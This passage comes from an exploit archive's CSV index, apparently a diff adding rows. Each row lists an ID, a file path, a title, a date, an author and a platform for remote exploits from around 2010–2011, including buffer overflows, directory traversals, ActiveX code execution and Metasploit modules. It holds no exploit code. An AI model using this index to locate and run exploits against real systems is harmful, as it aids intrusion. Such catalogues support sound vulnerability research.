Fadzil Ramli",remote,windows, +14456,exploits/aix/remote/14456.c,"IBM AIX 5l - 'FTPd' Remote DES Hash",2010-07-24,kingcope,remote,aix, +14496,exploits/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen & corelanc0d3r",remote,windows, +14489,exploits/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,remote,unix, +14492,exploits/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,remote,windows, +14505,exploits/windows/remote/14505.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote Buffer Overflow (SEH)",2010-07-30,loneferret,remote,windows, +14514,exploits/windows/remote/14514.html,"SigPlus Pro 3.74 - ActiveX 'LCDWriteString()' Remote Buffer Overflow JIT Spray (ASLR + DEP Bypass)",2010-07-31,mr_me,remote,windows, +14519,exploits/windows/remote/14519.html,"Barcodewiz Barcode ActiveX Control 3.29 - Remote HeapSpray (Internet Explorer 6/7)",2010-07-31,Dr_IDE,remote,windows, +14522,exploits/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",remote,windows, +14539,exploits/windows/remote/14539.html,"FathFTP 1.8 - 'RasIsConnected Method' ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,remote,windows, +14536,exploits/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",remote,hardware, +14551,exploits/windows/remote/14551.html,"FathFTP 1.8 - 'DeleteFile Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,remote,windows, +14552,exploits/windows/remote/14552.html,"FathFTP 1.8 - 'EnumFiles Method' ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,remote,windows, +14553,exploits/windows/remote/14553.html,"FathFTP 1.8 - 'FileExists Method' ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,remote,windows, +14580,exploits/windows/remote/14580.html,"Advanced File Vault - 'eSellerateControl350.dll' ActiveX HeapSpray",2010-08-08,"ThE g0bL!N",remote,windows, +14586,exploits/windows/remote/14586.html,"dBpowerAMP Audio Player 2 - 'FileExists' ActiveX Buffer Overflow",2010-08-09,s-dz,remote,windows, +14599,exploits/windows/remote/14599.txt,"AoA Audio Extractor - Remote ActiveX SEH JIT Spray (ASLR + DEP Bypass)",2010-08-10,Dr_IDE,remote,windows, +14600,exploits/windows/remote/14600.html,"SopCast 3.2.9 - Remote Command Execution",2010-08-10,sud0,remote,windows, +14602,exploits/multiple/remote/14602.txt,"Play! Framework 1.0.3.1 - Directory Traversal",2010-08-10,kripthor,remote,multiple, +14605,exploits/windows/remote/14605.html,"RSP MP3 Player - OCX ActiveX Buffer Overflow HeapSpray",2010-08-10,Madjix,remote,windows, +14604,exploits/windows/remote/14604.py,"Easy FTP 1.7.0.11 - 'NLST' / 'NLST -al' / 'APPE' / 'RETR' / 'SIZE' / 'XCWD' Remote Buffer Overflow",2010-08-10,"Rabih Mohsen",remote,windows, +14623,exploits/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflows",2010-08-11,"Glafkos Charalambous",remote,windows,21 +14658,exploits/windows/remote/14658.txt,"123 FlashChat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,remote,windows, +14641,exploits/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,anonymous,remote,multiple, +14674,exploits/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",remote,windows, +14779,exploits/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,remote,windows, +14853,exploits/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer",2010-09-01,Abysssec,remote,windows, +14856,exploits/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,remote,windows, +14857,exploits/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,remote,windows, +14875,exploits/multiple/remote/14875.txt,"Accton-based switches (3com / Dell / SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",remote,multiple, +14886,exploits/windows/remote/14886.py,"Microsoft Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,remote,windows, +14878,exploits/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (2)",2010-09-03,Abysssec,remote,windows, +14885,exploits/windows/remote/14885.html,"Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction",2010-11-17,Dr_IDE,remote,windows, +14895,exploits/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution",2010-09-05,Abysssec,remote,windows, +14925,exploits/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,remote,linux, +14941,exploits/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",remote,win_x86,80 +14976,exploits/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",remote,linux, +15001,exploits/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,remote,windows, +15042,exploits/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - 'call-back-url' Remote Stack Overflow",2010-09-19,Abysssec,remote,windows, +15005,exploits/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",remote,multiple, +15016,exploits/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,remote,windows, +15048,exploits/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,remote,windows, +15056,exploits/windows/remote/15056.py,"Java 6.19 CMM readMabCurveData - Remote Stack Overflow",2010-09-20,Abysssec,remote,windows, +15071,exploits/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - 'SoftekATL.dll' Remote Buffer Overflow (PoC)",2010-09-21,LiquidWorm,remote,windows, +15072,exploits/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,remote,windows, +15073,exploits/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Remote Buffer Overflow (Metasploit)",2010-09-21,Trancer,remote,windows, +15168,exploits/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX 'extSetOwner()' Remote Code Execution (Metasploit)",2010-10-01,Trancer,remote,windows, +15186,exploits/ios/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal",2010-10-02,m0ebiusc0de,remote,ios, +15213,exploits/asp/remote/15213.pl,"Microsoft ASP.NET - Padding Oracle (MS10-070)",2010-10-06,"Giorgio Fedon",remote,asp, +15600,exploits/windows/remote/15600.html,"Netcraft Toolbar 1.8.1 - Remote Code Execution",2010-11-23,Rew,remote,windows, +15601,exploits/windows/remote/15601.html,"ImageShack Toolbar 4.8.3.75 - Remote Code Execution",2010-11-23,Rew,remote,windows, +15231,exploits/windows/remote/15231.py,"Sync Breeze Server 2.2.30 - Remote Buffer Overflow",2010-10-11,"xsploited security",remote,windows, +15235,exploits/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP",2010-10-11,mr_me,remote,windows, +15238,exploits/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow",2010-10-12,"xsploited security",remote,windows, +15241,exploits/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Remote Buffer Overflow",2010-10-13,Skylined,remote,windows, +15244,exploits/unix/remote/15244.txt,"Oracle Virtual Server Agent - Command Injection",2010-10-13,"Nahuel Grisolia",remote,unix, +15265,exploits/asp/remote/15265.rb,"Microsoft ASP.NET - Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",remote,asp, +15266,exploits/windows/remote/15266.txt,"Microsoft Windows - NTLM Weak Nonce (MS10-012)",2010-10-17,"Hernan Ochoa",remote,windows, +15288,exploits/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass",2010-10-20,"Roberto Suggi Liverani",remote,windows, +15292,exploits/windows/remote/15292.rb,"Microsoft ASP.NET - Auto-Decryptor File Download (MS10-070)",2010-10-20,"Agustin Azubel",remote,windows, +15296,exploits/windows/remote/15296.txt,"Adobe Shockwave Player - 'rcsL chunk' Memory Corruption",2010-10-21,Abysssec,remote,windows, +15298,exploits/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",remote,multiple, +15318,exploits/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",remote,linux, +15333,exploits/windows/remote/15333.txt,"MinaliC WebServer 1.0 - Directory Traversal",2010-10-27,"John Leitch",remote,windows, +15336,exploits/windows/remote/15336.txt,"MinaliC WebServer 1.0 - Remote Source Disclosure / File Download",2010-10-27,Dr_IDE,remote,windows, +15337,exploits/windows/remote/15337.py,"DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow",2010-10-27,blake,remote,windows, +15347,exploits/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Remote Buffer Overflow",2010-10-28,n00b,remote,windows, +15349,exploits/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,remote,windows, +15352,exploits/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Remote Overflow",2010-10-29,anonymous,remote,windows, +15357,exploits/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",remote,windows, +15358,exploits/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",remote,windows, +15368,exploits/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",remote,windows, +15371,exploits/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,remote,windows, +15373,exploits/windows/remote/15373.txt,"Mongoose Web Server 2.11 - Directory Traversal",2010-11-01,nitr0us,remote,windows, +15421,exploits/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption",2010-11-04,ryujin,remote,windows, +15423,exploits/android/remote/15423.html,"Google Android 2.0 < 2.1 - Reverse Shell",2010-11-05,"MJ Keith",remote,android, +15427,exploits/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows, +15437,exploits/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",remote,windows, +15438,exploits/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",remote,windows, +15445,exploits/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,remote,windows, +15449,exploits/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,remote,linux, +15450,exploits/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",remote,windows,21 +15505,exploits/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",remote,hardware, +15548,exploits/android/remote/15548.html,"Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",remote,android, +15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple, +15631,exploits/hardware/remote/15631.txt,"HP LaserJet - Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",remote,hardware, +15648,exploits/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,remote,windows, +15655,exploits/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,remote,windows, +15658,exploits/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)",2010-12-02,bz1p,remote,windows, +15662,exploits/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution",2010-12-02,anonymous,remote,linux,21 +15664,exploits/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,remote,ios, +15668,exploits/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow",2010-12-03,Dr_IDE,remote,windows, +15689,exploits/windows/remote/15689.py,"Freefloat FTP Server - Remote Buffer Overflow",2010-12-05,0v3r,remote,windows, +15717,exploits/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",remote,multiple, +15723,exploits/freebsd/remote/15723.c,"Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow",2010-12-10,kingcope,remote,freebsd, +15725,exploits/linux/remote/15725.pl,"Exim 4.63 - Remote Command Execution",2010-12-11,kingcope,remote,linux, +15733,exploits/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX",2010-12-14,Dr_IDE,remote,windows, +15746,exploits/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser",2010-12-15,"Nephi Johnson",remote,windows, +15802,exploits/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",remote,windows, +15806,exploits/linux/remote/15806.txt,"Citrix Access Gateway - Command Injection",2010-12-22,"George D. Gal",remote,linux, +15809,exploits/windows/remote/15809.html,"Microsoft WMITools - ActiveX Remote Command Execution",2010-12-22,WooYun,remote,windows, +15834,exploits/windows/remote/15834.py,"Kolibri 2.0 - 'HEAD' Remote Buffer Overflow RET (SEH)",2010-12-26,TheLeader,remote,windows, +15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware, +15861,exploits/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",remote,windows, +15862,exploits/windows/remote/15862.txt,"QuickPHP Web Server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",remote,windows, +15866,exploits/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,remote,windows, +15868,exploits/windows/remote/15868.pl,"QuickPHP Web Server - Arbitrary '.php' File Download",2010-12-30,"Yakir Wizman",remote,windows, +15869,exploits/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,remote,windows, +15885,exploits/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,remote,windows, +18245,exploits/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",remote,multiple, +15991,exploits/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",remote,windows, +15957,exploits/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",remote,windows, +15937,exploits/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,remote,multiple, +16123,exploits/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",remote,hardware, +15963,exploits/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",remote,windows, +15984,exploits/windows/remote/15984.html,"Microsoft Data Access Components - Remote Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",remote,windows, +16014,exploits/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Command Execution",2011-01-19,Dr_IDE,remote,windows, +16036,exploits/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",remote,windows, +16041,exploits/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Privilege Escalation",2011-01-25,kingcope,remote,multiple, +16052,exploits/windows/remote/16052.txt,"Oracle Document Capture 10.1.3.5 - Insecure Method / Buffer Overflow",2011-01-26,"Alexandr Polyakov",remote,windows, +16053,exploits/windows/remote/16053.txt,"Oracle Document Capture - Actbar2.ocx Insecure Method",2011-01-26,"Evdokimov Dmitriy",remote,windows, +16055,exploits/windows/remote/16055.txt,"Oracle Document Capture - 'empop3.dll' Insecure Methods",2011-01-26,"Evdokimov Dmitriy",remote,windows, +16056,exploits/windows/remote/16056.txt,"Oracle - Document Capture Insecure READ Method",2011-01-26,"Alexey Sintsov",remote,windows, +16075,exploits/windows/remote/16075.pl,"Caedo HTTPd Server 0.5.1 ALPHA - Arbitrary File Download",2011-01-29,"Zer0 Thunder",remote,windows, +16078,exploits/windows/remote/16078.py,"SDP Downloader 2.3.0 - 'http_response' Remote Buffer Overflow",2011-01-30,sup3r,remote,windows, +16100,exploits/hardware/remote/16100.txt,"Tandberg E & EX & C Series Endpoints - Default Root Account Credentials",2011-02-02,"Cisco Security",remote,hardware, +16101,exploits/windows/remote/16101.py,"FTPGetter 3.58.0.21 - 'PASV' Remote Buffer Overflow",2011-02-03,modpr0be,remote,windows, +16103,exploits/multiple/remote/16103.txt,"Majordomo2 - 'SMTP/HTTP' Directory Traversal",2011-02-03,"Michael Brooks",remote,multiple, +16105,exploits/windows/remote/16105.txt,"quickshare file share 1.2.1 - Directory Traversal (1)",2011-02-03,modpr0be,remote,windows, +16137,exploits/multiple/remote/16137.c,"Multiple Vendor Calendar Manager - Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",remote,multiple, +16145,exploits/windows/remote/16145.pl,"Unreal Tournament - Remote Buffer Overflow (SEH)",2011-02-09,Fulcrum,remote,windows, +16149,exploits/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",remote,hardware, +16176,exploits/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,remote,windows, +16177,exploits/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,remote,windows, +16226,exploits/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,hardware, +16208,exploits/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, +16209,exploits/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, +16227,exploits/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,hardware, +16228,exploits/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, +16229,exploits/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, +16231,exploits/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",remote,ios, +16238,exploits/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,"Khashayar Fereidani",remote,hardware, +16239,exploits/hardware/remote/16239.txt,"iPhone Guitar - Directory Traversal",2011-02-24,"Khashayar Fereidani",remote,hardware, +16240,exploits/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,"Khashayar Fereidani",remote,hardware, +16242,exploits/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",remote,windows, +16243,exploits/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,"Khashayar Fereidani",remote,hardware, +16244,exploits/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,"Khashayar Fereidani",remote,hardware, +16245,exploits/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",remote,hardware, +16259,exploits/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,remote,windows, +16271,exploits/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",remote,ios, +16275,exploits/hardware/remote/16275.txt,"COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",remote,hardware, +16278,exploits/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,remote,ios, +16285,exploits/linux/remote/16285.rb,"NTP daemon readvar - Remote Buffer Overflow (Metasploit)",2010-08-25,Metasploit,remote,linux, +16286,exploits/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,remote,multiple, +41785,exploits/linux/remote/41785.rb,"Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)",2017-04-03,"Chris Hebert",remote,linux, +16289,exploits/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,remote,linux, +16291,exploits/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,remote,multiple, +16293,exploits/multiple/remote/16293.rb,"Sun Java - Calendar Deserialization (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16294,exploits/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank 'file://' URI Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16295,exploits/multiple/remote/16295.rb,"Apple QTJava - 'toQTPointer()' Arbitrary Memory Access (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16296,exploits/osx/remote/16296.rb,"Apple iTunes 8.1.1 (Mac OSX) - ITms Overflow (Metasploit)",2010-11-11,Metasploit,remote,osx, +16297,exploits/multiple/remote/16297.rb,"Java - 'Statement.invoke()' Trusted Method Chain (Metasploit)",2010-12-15,Metasploit,remote,multiple, +16298,exploits/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16299,exploits/multiple/remote/16299.rb,"Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16300,exploits/multiple/remote/16300.rb,"Mozilla Suite/Firefox - Navigator Object Code Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16301,exploits/multiple/remote/16301.rb,"Mozilla Firefox - location.QueryInterface() Code Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16302,exploits/multiple/remote/16302.rb,"Signed Applet Social Engineering - Code Execution (Metasploit)",2011-01-08,Metasploit,remote,multiple, +16303,exploits/multiple/remote/16303.rb,"Opera 9 - Configuration Overwrite (Metasploit)",2010-07-27,Metasploit,remote,multiple, +16304,exploits/multiple/remote/16304.rb,"Opera historysearch - Cross-Site Scripting (Metasploit)",2010-11-11,Metasploit,remote,multiple, +16305,exploits/multiple/remote/16305.rb,"Java - RMIConnectionImpl Deserialization Privilege Escalation (Metasploit)",2010-09-27,Metasploit,remote,multiple, +16306,exploits/windows/remote/16306.rb,"Mozilla Suite/Firefox - InstallVersion->compareTo() Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows, +16308,exploits/multiple/remote/16308.rb,"Maple Maplet - File Creation / Command Execution (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16309,exploits/multiple/remote/16309.rb,"Adobe - U3D CLODProgressiveMeshDeclaration Array Overrun (Metasploit) (1)",2010-09-20,Metasploit,remote,multiple, +16310,exploits/multiple/remote/16310.rb,"PHP 4 - Unserialize() ZVAL Reference Counter Overflow (Cookie) (Metasploit)",2010-09-20,Metasploit,remote,multiple, +16311,exploits/linux/remote/16311.rb,"WU-FTPD - Site EXEC/INDEX Format String (Metasploit)",2010-11-30,Metasploit,remote,linux, +16312,exploits/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST) (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16314,exploits/multiple/remote/16314.rb,"Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,remote,multiple, +16315,exploits/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP) (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16316,exploits/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,remote,multiple, +16317,exploits/multiple/remote/16317.rb,"Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,remote,multiple, +16318,exploits/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,remote,multiple, +16319,exploits/multiple/remote/16319.rb,"JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)",2011-01-10,Metasploit,remote,multiple, +16320,exploits/unix/remote/16320.rb,"Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)",2010-08-18,Metasploit,remote,unix, +16321,exploits/linux/remote/16321.rb,"Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)",2010-04-28,Metasploit,remote,linux, +16322,exploits/solaris/remote/16322.rb,"Solaris LPD - Command Execution (Metasploit)",2010-09-20,Metasploit,remote,solaris, +16323,exploits/solaris_sparc/remote/16323.rb,"Solaris dtspcd - Remote Heap Overflow (Metasploit)",2010-04-30,Metasploit,remote,solaris_sparc, +16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple, +16325,exploits/solaris/remote/16325.rb,"Sun Solaris sadmind - 'adm_build_path()' Remote Buffer Overflow (Metasploit)",2010-07-03,Metasploit,remote,solaris, +16326,exploits/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution (Metasploit)",2010-07-25,Metasploit,remote,solaris, +16327,exploits/solaris/remote/16327.rb,"Solaris TelnetD - 'TTYPROMPT' Remote Buffer Overflow (2) (Metasploit)",2010-06-22,Metasploit,remote,solaris, +16328,exploits/solaris/remote/16328.rb,"Sun Solaris Telnet - Remote Authentication Bypass (Metasploit)",2010-06-22,Metasploit,remote,solaris, +16329,exploits/solaris/remote/16329.rb,"Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,remote,solaris, +16330,exploits/solaris_sparc/remote/16330.rb,"Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)",2010-06-21,Metasploit,remote,solaris_sparc, +16331,exploits/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Remote Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16332,exploits/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow (Metasploit)",2010-07-03,Metasploit,remote,windows, +16333,exploits/windows/remote/16333.rb,"Microsoft Windows Media Services - ConnectFunnel Stack Buffer Overflow (MS10-025) (Metasploit)",2010-04-28,Metasploit,remote,windows, +16334,exploits/windows/remote/16334.rb,"Microsoft Private Communications Transport - Remote Overflow (MS04-011) (Metasploit)",2010-09-20,Metasploit,remote,windows, +16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows, +16336,exploits/windows/remote/16336.rb,"NIPrint LPD - Request Overflow (Metasploit)",2010-12-25,Metasploit,remote,windows, +16337,exploits/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows, +16338,exploits/windows/remote/16338.rb,"SapLPD 6.28 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows, +16339,exploits/windows/remote/16339.rb,"Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)",2010-11-24,Metasploit,remote,windows, +16340,exploits/windows/remote/16340.rb,"Oracle 8i - TNS Listener 'ARGUMENTS' 